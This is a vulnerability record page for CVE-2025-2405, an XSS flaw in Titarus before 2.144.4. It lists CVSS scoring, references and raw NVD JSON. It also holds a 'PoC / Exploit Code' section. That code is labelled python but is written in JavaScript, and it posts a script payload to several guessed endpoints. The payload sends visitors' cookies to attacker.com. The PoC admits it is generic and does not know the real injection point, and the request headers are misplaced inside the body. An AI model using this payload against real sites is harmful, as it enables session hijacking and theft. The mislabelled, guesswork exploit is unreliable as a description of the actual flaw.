CVE-2025-2405

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Verisay Communication and Information Technology Industry and Trade Ltd. Co. Titarus allows Cross-Site Scripting (XSS).This issue affects Titarus: before 2.144.4.

CVSS Details

CVSS Score

7.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Titarus < 2.144.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-2405 PoC - XSS in Titarus
// Target: Titarus < 2.144.4

const axios = require('axios');

// Replace with actual target URL
const targetUrl = 'https://vulnerable-titarus-site.com';

// XSS Payload
const xssPayload = '<script>document.location="https://attacker.com/steal?cookie="+document.cookie</script>';

async function exploit() {
  try {
    // Try to inject XSS in common input fields
    // This is a generic PoC - specific injection point needs to be identified
    const injectionPoints = [
      '/api/submit',
      '/user/profile',
      '/message/send',
      '/comment/add'
    ];

    for (const endpoint of injectionPoints) {
      try {
        const response = await axios.post(targetUrl + endpoint, {
          data: xssPayload,
          headers: {
            'Content-Type': 'application/json'
          },
          timeout: 5000
        });
        console.log(`Injected at ${endpoint}: Status ${response.status}`);
      } catch (error) {
        console.log(`Failed at ${endpoint}: ${error.message}`);
      }
    }
  } catch (error) {
    console.error('Exploit failed:', error.message);
  }
}

exploit();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-2405
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-2405
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-2405/
[4] VulDB https://vuldb.com/cve/CVE-2025-2405
[5] https://www.usom.gov.tr/bildirim/tr-25-0485

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-2405", "sourceIdentifier": "[email protected]", "published": "2025-12-25T14:15:52.707", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Verisay Communication and Information Technology Industry and Trade Ltd. Co. Titarus allows Cross-Site Scripting (XSS).This issue affects Titarus: before 2.144.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0485", "source": "[email protected]"}]}}